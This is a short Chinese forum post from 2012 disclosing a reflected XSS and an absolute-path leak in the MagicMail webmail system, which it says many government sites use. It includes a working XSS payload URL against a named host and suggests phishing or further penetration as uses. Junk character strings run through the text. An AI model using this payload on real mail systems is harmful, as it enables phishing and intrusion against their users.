今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
; T$ i! r& U- q0 e! E, Y5 S+ f- f
8 {# `. X7 @4 d/ ]& E( K
5 m5 G8 X3 M6 K Z& @- Z5 @包含 一个反射性XSS 以及 绝对路径泄漏
/ t( M8 Z, d& C看了看 貌似全部是linux的。; @$ H; o, f* w" h$ L O5 w. {
! s2 X0 L, Y7 Z8 p: X7 l" \关键字:迈捷邮件系统 by MagicMail' N2 Q0 _1 _) f' d3 d" I' v
; ^/ ^5 n5 j2 t( }* T可以看到很多政府网站都用这个邮件系统
& j$ Q; |8 [2 q- M
. x# x( [% m! G: h$ C绝对路径 http://madman.in/index.php?login_type=declare&language=9 k5 M" N4 \' k; p' D, F! l
) y9 Y* _# W. |2 z* B8 P: A. \
" y( {# G3 s' i2 l! n% Y* b
& B- Q4 o: m9 |9 r) bXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E4 C# l* V. l5 i6 Q# [1 S
, X/ m* J% {% m$ i: b( v& V9 Y, ~8 Q @ v V1 V( r
# n* Z# G- ~2 W- r. k" |( [虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
# r1 l# n$ x5 R0 P" d7 [ - s0 l" R% H& H, x6 l8 @+ b% m) E$ z! y
修复方案:看官方补丁吧。/ w: c8 f- k T3 }- b+ x( q" @
|
发表于 2012-11-9 20:38:41
收藏
支持
反对